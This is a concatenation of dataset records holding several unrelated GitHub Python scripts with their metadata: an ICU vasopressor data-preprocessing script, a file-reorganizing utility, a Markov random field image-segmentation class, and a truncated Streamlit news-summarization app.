the id below to check\nid_check = [el for el in d['all_IDs']][idoi]\nmos=[el for el in d['all_states'][idoi]]\nmos=[el[19] for el in mos]\n\n\n\n\nmoa=[el for el in d['all_actions'][idoi]]\nmor=[el for el in d['all_rewards'][idoi]]\n\n\n\nfirst_low_maps = pickle.load(open('all_first_low_map.p','rb'))\ns=pickle.load(open('all_states.p','rb')) #used?\nprint([el for el in d.keys()])\n\n#no_ind = [(('ind' not in el) and ('last_' not in el)) for el in d['state_var_names']]\n# by data_clean.py, actions 0-3 are 0 vaso\n# hence we need to check for each visit whether there is a number greater than 3\n## why some zero. if no action.\nprint(\"n\",len(d['all_actions']))\n\n#this should check for emptiness, not take max\nmxs=[]\nfor el in d['all_actions']:\n\ttry:\n\t\tmxs.append(np.max(el))\n\texcept: \n\t\tmxs.append(np.NAN)\n\ntakes = [~np.isnan(el) for el in mxs]\ndid_sub=d['all_IDs'][takes]\ndst_sub=d['all_states'][takes]\ndac_sub=d['all_actions'][takes]\ndre_sub=d['all_rewards'][takes]\ndti_sub=d['all_action_times'][takes]\n\n[el for el in d['all_IDs']][42]\n\nd={'all_states':dst_sub,'all_actions':dac_sub,'all_rewards':dre_sub,\n'all_IDs':did_sub,'all_action_times':dti_sub,'state_var_names':d['state_var_names']}\nprint(\"n\",len(d['all_actions']))\n\nidoi = 19\n# can use the id below to check\nid_check = [el for el in d['all_IDs']][idoi]\nmos=[el for el in d['all_states'][idoi]]\nmos=[el[19] for el in mos]\nmoa=[el for el in d['all_actions'][idoi]]\nmor=[el for el in d['all_rewards'][idoi]]\n\n# now 201098 is index 49, which would be index 50 in R \n#[el for el in d['all_IDs']][49]\n\n# if greater than three, implies vaso given\n# if greater than zero, either vaso or fluid given\n\n\nif fluidAndVaso:\n gt3=[np.max(el)>0 for el in d['all_actions']]\nelse:\n gt3=[np.max(el)>3 for el in d['all_actions']]\nnp.mean(gt3) #.27. So about 1/4 of time, use vaso. check with Joe's summary\n# Joe has more vaso. 
It looks like maybe 3/4 vaso..\n\n#fs = []\n#for (sts,id) in zip(d['all_states'],d['all_IDs']):\n#\tpdb.set_trace()\n#\tfs.append(sts[first_low_maps[id]])\n\nall_states_list = [el for el in d['all_states']]\n\nfs = []\nfor (id,el) in zip(d['all_IDs'],d['all_states']):\n try:\n fs.append(el[0])\n except:\n fs.append([np.NAN])\n\n#fs=[el[0] for el in d['all_states']]\n#fs_noind=[el[no_ind] for el in fs]\n#varsnames_noind=d['state_var_names'][no_ind]\nvarsnames = d['state_var_names']\n\n#mean_rewards = [np.mean(el) for el in d['all_rewards']]\n\nmean_rewards = []\nfor el in d['all_rewards']:\n try: \n mean_rewards.append(np.mean(el))\n except:\n print(\"in except\")\n mean_rewards.append(np.NAN)\n\nnp.mean(mean_rewards)\nnp.max(mean_rewards)\nnp.min(mean_rewards)\n\nfs_arr = np.array(fs)\nsdf = pd.DataFrame(fs)\nsdf.columns = varsnames\nsdf.to_csv(\"first_states.csv\")#,index=False)\n\nls = []\nfor el in d['all_states']:\n try:\n ls.append(el[-1])\n except:\n ls.append(np.NAN)\n #[el[-1] for el in d['all_states']]\n\n#ls_noind=[el[no_ind] for el in ls]\n\nls_arr = np.array(ls)\nsdf = pd.DataFrame(ls)\nsdf.columns = varsnames\nsdf.to_csv(\"last_states.csv\")#,index=False)\n\n# don't set index to false, because if so R will remove blanks\npd.DataFrame({'r':mean_rewards}).to_csv('mean_rewards.csv')#,index=False)\ngt3=[int(el) for el in gt3]\npd.DataFrame({'a':gt3}).to_csv('vaso.csv')#,index=False)\n\n\nat=d['all_action_times']#pickle.load(open(\"all_raw_actions_times.p\",\"rb\"))\natkeys = d['all_IDs']#[el for el in at.keys()]\n\nms=make_multistage(d, exp_name,maxT=maxT,at=at)\n\nTs=[np.max(el) for el in at]\n\npd.DataFrame({'Ts':Ts}).to_csv('Ts.csv')#,index=False)\n\npdb.set_trace()\ntgt24 = {}\nfor id in atkeys: tgt24[id] = at[id].Times>24\n\n\n#fluid_starts = fluids_dat['ICUSTAY_ID'].searchsorted(final_ICU_IDs,'left')\n\n# aggregate first and last 12 hours\n# just one way to make a 2 stage decision\n# I wonder if more stable\ncp=1\nif cp ==1:\n changepoints = {}\n for id in atkeys: \n changepoints[id] = tgt24[id].searchsorted('True','left')\n #tgt24[atkeys[2]].searchsorted('True','left')\n states=[el for el in d['all_states']]\n ids=[el for el in d['all_IDs']]\n rewards = [el for el in d['all_rewards']]\n actions = [el for el in d['all_actions']]\n\n ss = list()\n for (id,state) in zip(ids,states):\n if changepoints[id] < len(state):\n ss.append(state[changepoints[id]])\n else:\n ss.append(np.NAN)\n\n #sss = \n\n #pd.DataFrame()\n\n rr = list()\n for (i,id) in enumerate(ids):\n tmask = tgt24[id][1:-1]\n rr.append(\n [np.mean(rewards[i][~tmask]),np.mean(rewards[i][tmask])]\n )\n\n aa = list()\n for (i,id) in enumerate(ids):\n tmask = tgt24[id][1:-1]\n aa.append(\n [np.sum(actions[i][~tmask]>3)>0,np.sum(actions[i][tmask]>3)>0]\n ) \n\n\n tgt24[ids[2]]\n\n\n\n\n\n### end of multistage data generation\n \n#before_sts = pd.DataFrame(np.array(mean_before_hyps))\n\n#before_sts.columns = float_names\n#before_sts.to_csv(\"mean_before_hyp_floats.csv\")#,index=False)\n\n#np.save(\"hyp_s\",ne)\n\n#print(\"n (more than 2 states - problematic)\",len(hyp_ids))\n\n# first and last state (eg, if going to treat whole trajectory)\n# as one decision\n\nhyp_fs = [el[0] for el in hyp_states]\nhyp_ls = [el[-1] for el in hyp_states]\n\nhyp_mxs=[]\nfor el in hyp_actions:\n try:\n hyp_mxs.append(np.max(el))\n except: \n #print(\"exception\")\n hyp_mxs.append(np.NAN)\n\n# whether ever given vaso\n\nhyp_vaso=[el>3 for el in hyp_mxs]\npctv = np.mean(hyp_vaso)\n\n# average reward\n\nhyp_mean_rewards = [np.mean(el) for el 
in hyp_rewards]\nhyp_first_rewards = []\nfor el in hyp_rewards:\n    \n    if len(el)>=1:\n        hyp_first_rewards.append(el[0]) \n    else:\n\n        hyp_first_rewards.append(np.NAN)\nhyp_first_actions = []\nfor el in hyp_actions:\n    if len(el)>=1:\n        hyp_first_actions.append(el[0])\n    else:\n        hyp_first_actions.append(np.NAN)\n\n# overall mean\nprint(\"prop w mean reward small\",np.mean([el<0 for el in mean_rewards]))\nprint(\"prop given vaso\",np.mean(gt3))\n\n# hypo mean\nhyp_first_vaso = [el>3 for el in hyp_first_actions]\npctrlz = np.mean([el<0 for el in hyp_mean_rewards])\nprint(\"hypo prop given vaso\",pctv)\nprint(\"hypo prop r<0\",pctrlz)\n\n# hypo first rewards,actions\nprint(\"hypo prop w first reward small\",np.mean([el<0 for el in hyp_first_rewards]))\nprint(\"hypo prop given vaso first\",np.mean([el>3 for el in hyp_first_actions]))\n\n\n# some rewards are nan\n# because they only have one state after hypotension.\n# so no second state to measure a reward\n# we will therefore subset by those with at least 1 state after hypo\n\n# actually, don't do this. keep in form with multistage above\n\nls = [len(el) for el in hyp_states]\nstlg1 = [el>1 for el in ls]\n\n\nhyp_as=pd.DataFrame({\"a\":hyp_vaso})#[stlg1]\nhyp_as.to_csv(\"hyp_a.csv\")#,index=False)\n\nhyp_first_as=pd.DataFrame({\"a\":hyp_first_vaso})#[stlg1]\nhyp_first_as.to_csv(\"hyp_first_a.csv\")#,index=False)\n\n\nhyp_rs = pd.DataFrame({\"r\":hyp_mean_rewards})#[stlg1]\nhyp_rs.to_csv(\"hyp_r.csv\")#,index=False)\n\nhyp_first_rs = pd.DataFrame({\"r\":hyp_first_rewards})#[stlg1]\nhyp_first_rs.to_csv(\"hyp_first_r.csv\")#,index=False)\n\n#hyp_fs_noind=[el[no_ind] for el in hyp_fs]\nfsdf=pd.DataFrame(hyp_fs)#[stlg1]\nfsdf.columns = varsnames\nfsdf.to_csv(\"hyp_fs.csv\")#,index=False)\n#hyp_ls_noind=[el[no_ind] for el in hyp_ls]\nlsdf=pd.DataFrame(hyp_ls)#[stlg1]\nlsdf.columns = varsnames\nlsdf.to_csv(\"hyp_ls.csv\")#,index=False)\n\npdb.set_trace()\nprint(\"NEED TO GO BACK AND DEAL WITH NULL ACTIONS\")\npdb.set_trace()\n\n", "repo_name": "samuelweisenthal/relative_sparsity", "sub_path": "np_load.py", "file_name": "np_load.py", "file_ext": "py", "file_size_in_byte": 11131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.chdir", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 97, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 113, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 128, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 144, "usage_type": 
"attribute"}, {"api_name": "numpy.isnan", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 214, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 224, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 235, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 247, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 275, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 325, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.NAN", "line_number": 342, "usage_type": "attribute"}, {"api_name": "numpy.NAN", "line_number": 348, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 361, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 362, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 379, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 386, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 390, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 394, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 398, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 400, "usage_type": "call"}]}
+{"seq_id": "36035913823", "text": "import os\nimport os.path\nimport shutil\nimport sys\nimport datetime, time, timedelta\n\ndef removeTfiles():\n # find REC -type f -name 't*.*' -delete\n print(\"hola\")\n\ndef splitExistOrReover():\n #source = sys.argv[1]\n #destination = sys.argv[2]\n source = \"/media/jroigfer/discExtern250/RECINM42020\"\n destinationDeleted = \"/media/jroigfer/temp/REC INM 2020/deleted\"\n destinationExisted = \"/media/jroigfer/temp/REC INM 2020/existed\"\n\n #while not os.path.exists(source):\n # source = raw_input('Enter a valid source directory\\n')\n #while not os.path.exists(destination):\n # destination = raw_input('Enter a valid destination directory\\n')\n\n for root, dirs, files in os.walk(source, topdown=False):\n for file in files:\n extension = os.path.splitext(file)[1][1:].upper()\n try:\n mtime = os.path.getmtime(file)\n except OSError:\n mtime = 0\n last_modified_date = datetime.datetime.fromtimestamp(mtime)\n\n time.strftime('%m/%d/%Y', time.gmtime(os.path.getmtime(file)))\n print(\"Last Modified Time 1 : \", last_modified_date)\n\n timeNow = datetime.datetime.now() - datetime.timedelta(days=7)\n if last_modified_date < timeNow:\n print(\"file \" + file + \" ORIGINAL \" + repr(last_modified_date))\n else:\n print(\"RECUPERADA \" + repr(last_modified_date))\n\n\n #modificationTime = last_modified_date.strftime('%Y-%m-%d %H:%M:%S', time.localtime(mtime))\n # print(\"Last Modified Time 2 : \", modificationTime)\n\n #shutil.copy2(os.path.join(root, file), destinationPath)\n\n# OJO - priemr se debe crear carpeta deleted existed y rep\ndef splitExistOrReover():\n #source = \"/media/jroigfer/temp/REC INM 2020\"\n source = \"/media/jroigfer/temp_part/REC2/\"\n\n #destinationDeleted = \"/media/jroigfer/temp/REC INM 2020/deleted\"\n #destinationExisted = \"/media/jroigfer/temp/REC INM 2020/existed\"\n\n destinationDeleted = source + \"deleted\"\n destinationExisted = source + \"existed\"\n destinationRepe = source + \"rep\"\n\n if not os.path.exists(source + \"/existed\"):\n os.mkdir(source + \"/existed\")\n if not os.path.exists(source + \"/deleted\"):\n os.mkdir(source + \"/deleted\")\n if not os.path.exists(source + \"/rep\"):\n os.mkdir(source + \"/rep\")\n\n countBasicFold = 0\n for addonFolder in os.listdir(source):\n print(\"fold: \" + addonFolder)\n if addonFolder == \"deleted\" or addonFolder == \"existed\" or addonFolder == \"rep\":\n countBasicFold = countBasicFold + 1\n\n if countBasicFold == 3:\n for addonFolder in os.listdir(source):\n print(\"fold: \" + addonFolder)\n if addonFolder == \"deleted\" or addonFolder == \"existed\" or addonFolder == \"rep\":\n print(\"no \" + addonFolder)\n else:\n for fileRec in os.listdir(source + \"/\" + addonFolder):\n print(\"file rec \" + addonFolder + \"/\" + fileRec)\n fileOrigComp = source + \"/\" + addonFolder + \"/\" + fileRec\n\n last_modified_date = time.gmtime(os.path.getmtime(fileOrigComp))\n last_modified_date_str = time.strftime('%d/%m/%Y', last_modified_date)\n #last_modified_date = datetime.datetime.fromtimestamp(last_modified_date)\n print(\"Last Modified Time 1 : \", last_modified_date_str)\n fileDateM = datetime.datetime.fromtimestamp(os.path.getmtime(fileOrigComp)).date()\n\n timeLastWeek = datetime.datetime.now() - datetime.timedelta(days=7)\n if fileDateM < timeLastWeek.date():\n print(\"EXIS: \" + fileRec + \" ORIGINAL \" + repr(last_modified_date))\n if not os.path.isfile(destinationExisted + \"/\" + fileRec):\n shutil.move(fileOrigComp, destinationExisted)\n else:\n 
shutil.move(fileOrigComp, destinationRepe)\n                    else:\n                        print(\"BORR: \" + fileRec + \" ORIGINAL \" + repr(last_modified_date))\n                        if not os.path.isfile(destinationDeleted + \"/\" + fileRec):\n                            shutil.move(fileOrigComp, destinationDeleted)\n                        else:\n                            shutil.move(fileOrigComp, destinationRepe)\n    else:\n        print(\"the basic folders are not there!\")\n\n# NOTE - the deleted, existed and rep folders must be created first\ndef organizeInYears():\n    source = \"/media/jroigfer/temp_part/REC2/\"\n\n    origin = source + \"existed\"\n    destinationExisted = source + \"existed/years\"\n\n    if not os.path.exists(destinationExisted):\n        os.mkdir(destinationExisted)\n        print(\"created %s\" % (destinationExisted))\n\n    for fileRec in os.listdir(origin):\n        if fileRec.endswith(\"years\"):\n            print(\"discarded year folder\")\n        else:\n            fileOrigComp = origin + \"/\" + fileRec\n\n            last_modified_date = time.gmtime(os.path.getmtime(fileOrigComp))\n            year = time.strftime('%Y', last_modified_date)\n            pathyear = destinationExisted + \"/\" + year\n\n            if not os.path.exists(pathyear):\n                os.mkdir(pathyear)\n                print(\"created %s\" % (pathyear))\n\n            print(\"move from %s to %s\" % (fileOrigComp,pathyear))\n            shutil.move(fileOrigComp, pathyear)\n\nif __name__ == '__main__':\n    splitExistOrReover()\n    organizeInYears()", "repo_name": "jroigfer/XDrepoProject", "sub_path": "src/temp-test/reorganize_files.py", "file_name": "reorganize_files.py", "file_ext": "py", "file_size_in_byte": 5534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.walk", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 32, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.getmtime", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 35, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 64, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 67, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 73, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 78, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 82, "usage_type": "call"}, {"api_name": 
"os.path.getmtime", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 83, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 88, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 88, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 92, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 98, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 112, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 115, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.getmtime", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 126, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 130, "usage_type": "call"}]}
+{"seq_id": "17683372642", "text": "import numpy as np\nimport cv2 as cv\nimport copy\n\n\nclass MRF():\n def __init__(self, img, max_iter=100, num_clusters=5, init_func=None, beta=8e-4):\n self.max_iter = max_iter\n self.kernels = np.zeros(shape=(8, 3, 3))\n self.beta = beta\n #todo 标签的数量\n self.num_clusters = num_clusters\n #todo 获取其八邻域的像素值\n for i in range(9):\n if i < 4:\n self.kernels[i, i // 3, i % 3] = 1\n elif i > 4:\n self.kernels[i - 1, i // 3, i % 3] = 1\n #todo 灰度图归一化后的值\n self.img = img\n if init_func is None:\n self.labels = np.random.randint(low=1, high=num_clusters + 1, size=img.shape, dtype=np.uint8)\n\n def __call__(self):\n img = self.img.reshape((-1,))\n # todo 最外层的大循环\n for iter in range(self.max_iter):\n # todo p1的作用,大小为标签数量*图片的大小\n p1 = np.zeros(shape=(self.num_clusters, self.img.shape[0] * self.img.shape[1]))\n # todo 对每一个标签进行循环\n for cluster_idx in range(self.num_clusters):\n #todo\n temp = np.zeros(shape=(self.img.shape))\n #todo 每一个像素周围的8个标签的值,看周围的八个像素提供的标签参考\n for i in range(8):\n res = cv.filter2D(self.labels, -1, self.kernels[i, :, :])\n temp[(res == (cluster_idx + 1))] -= self.beta\n temp[(res != (cluster_idx + 1))] += self.beta\n temp = np.exp(-temp)\n #todo 标签信息被存放在p中\n p1[cluster_idx, :] = temp.reshape((-1,))\n # todo 转换成概率???\n p1 = p1 / np.sum(p1)\n # todo 如果是0也将其赋予一定的概率\n p1[p1 == 0] = 1e-3\n # todo 这里的mu为均值,sigma为方差\n mu = np.zeros(shape=(self.num_clusters,))\n sigma = np.zeros(shape=(self.num_clusters,))\n for i in range(self.num_clusters):\n # mu[i] = np.mean(self.img[self.labels == (i+1)])\n # todo 因为labels为1,2,而原来的值的范围为【0,2】\n data = self.img[self.labels == (i + 1)]\n if np.sum(data) > 0:\n mu[i] = np.mean(data)\n sigma[i] = np.var(data)\n\n else:\n mu[i] = 0\n sigma[i] = 1\n # print(sigma[i])\n # sigma[sigma == 0] = 1e-3\n #todo p2的作用是计算p(fs|ws)\n p2 = np.zeros(shape=(self.num_clusters, self.img.shape[0] * self.img.shape[1]))\n # todo 对于每一个像素\n for i in range(self.img.shape[0] * self.img.shape[1]):\n # todo 判断其标签\n for j in range(self.num_clusters):\n # print(sigma[j])\n # todo 这里计算的P(fs|Ws),先验概率,i guess so\n p2[j, i] = -np.log(np.sqrt(2 * np.pi) * sigma[j]) - (img[i] - mu[j]) ** 2 / 2 / sigma[j];\n\n self.labels = np.argmax(np.log(p1) + p2, axis=0) + 1\n self.labels = np.reshape(self.labels, self.img.shape).astype(np.uint8)\n print(\"-----------start-----------\")\n print(p1)\n print(\"-\" * 20)\n print(p2)\n print(\"----------end------------\")\n # print(\"iter {} over!\".format(iter))\n # self.show()\n # print(self.labels)\n\n def show(self):\n h, w = self.img.shape\n show_img = np.zeros(shape=(h, w, 3), dtype=np.uint8)\n show_img[self.labels == 1, :] = (0, 255, 255)\n show_img[self.labels == 2, :] = (220, 20, 60)\n show_img[self.labels == 3, :] = (65, 105, 225)\n show_img[self.labels == 4, :] = (50, 205, 50)\n # img = self.labels / (self.num_clusters) * 255\n\n cv.imshow(\"res\", show_img)\n cv.waitKey(0)\n\n\nif __name__ == \"__main__\":\n img = cv.imread(\"woman.jpg\")\n\n img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n img = img / 255.\n # img = np.random.rand(64,64)\n # img = cv.resize(img,(256,256))\n mrf = MRF(img=img, max_iter=20, num_clusters=4)\n mrf()\n mrf.show()\n # print(mrf.kernels)", "repo_name": "lxlscut/markov", "sub_path": "segmentation.py", "file_name": "segmentation.py", "file_ext": "py", "file_size_in_byte": 4338, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.zeros", "line_number": 9, "usage_type": "call"}, {"api_name": 
"numpy.random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 85, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 99, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 99, "usage_type": "attribute"}]}
+{"seq_id": "41888466181", "text": "import streamlit as st\nfrom helper import get_summary, spacy_rander, fetch_news, fetch_news_links\n\n\nst.set_page_config(\n page_title=\"Data Analysis Web App\",\n page_icon=\"🧊\",\n layout=\"wide\",\n initial_sidebar_state=\"expanded\",\n menu_items={\n 'Get Help': 'https://github.com/everydaycodings/Text-Summarization-using-NLP',\n 'Report a bug': \"https://github.com/everydaycodings/Text-Summarization-using-NLP/issues/new\",\n 'About': \"# This is a header. This is an *extremely* cool app!\"\n }\n)\n\n\nst.sidebar.title(\"Text Summarization Web App\")\n\noption = [\"News Summary and Headlines\", \"Custom Text Summarization\"]\nchoice = st.sidebar.selectbox(\"Select of your choice\", options=option)\n\n\nif choice == \"Custom Text Summarization\":\n st.sidebar.markdown(\"Copy Sample Article if you want to test the web app. [[article source](https://edition.cnn.com/2022/02/14/us/new-mexico-albuquerque-stabbings/index.html)]\")\n st.sidebar.code(open(\"presentation/sample.txt\",\"r\").read())\n st.title(\"Welcome to {}\".format(choice))\n\n col1, col2 = st.columns(2)\n\n with col1:\n text = st.text_area(label=\"Enter Your Text or story\", height=350, placeholder=\"Enter Your Text or story or your article iit can be of any length\")\n \n if st.button(\"Get Summary and Headline\"):\n summary = get_summary(text)\n\n try:\n with col2:\n st.write(\"Text Summary (Summary length: {})\".format(len(summary)))\n st.code(summary)\n st.write(\"Text Headline\")\n st.code(\"Feature Comming Soon\")\n\n spacy_rander(summary)\n\n #with st.expander(\"Get Original Article Analysis\"):\n spacy_rander(text, text=\"Yes\")\n \n except NameError:\n pass\n\nif choice == \"News Summary and Headlines\":\n st.title(\"BBC News Summary\")\n\n search_query = st.text_input(\"\", placeholder=\"Enter the topic you want to search\")\n st.write(\" \")\n\n link, title, thumbnail = fetch_news_links(search_query)\n fetch_news = fetch_news(link)\n \n if link != []:\n col1, col2 = st.columns(2)\n\n with col1:\n for i in range(len(link)):\n if (i % 2) == 0:\n st.image(thumbnail[i])\n st.write(title[i])\n with st.expander(\"Read The Summary\"):\n st.write(get_summary(fetch_news[i]))\n st.markdown(\"[**Read Full Article**]({})\".format(link[i]), unsafe_allow_html=True)\n st.write(\" \")\n \n with col2:\n for i in range(len(link)):\n if (i % 2) != 0:\n st.image(thumbnail[i])\n st.write(title[i])\n with st.expander(\"Read The Summary\"):\n st.write(get_summary(fetch_news[i]))\n st.markdown(\"[**Read Full Article**]({})\".format(link[i]), unsafe_allow_html=True)\n st.write(\" \")\n \n else:\n st.info(\"No Result found for {} Please try some popular Keywords\".format(search_query))\n", "repo_name": "everydaycodings/Text-Summarization-using-NLP", 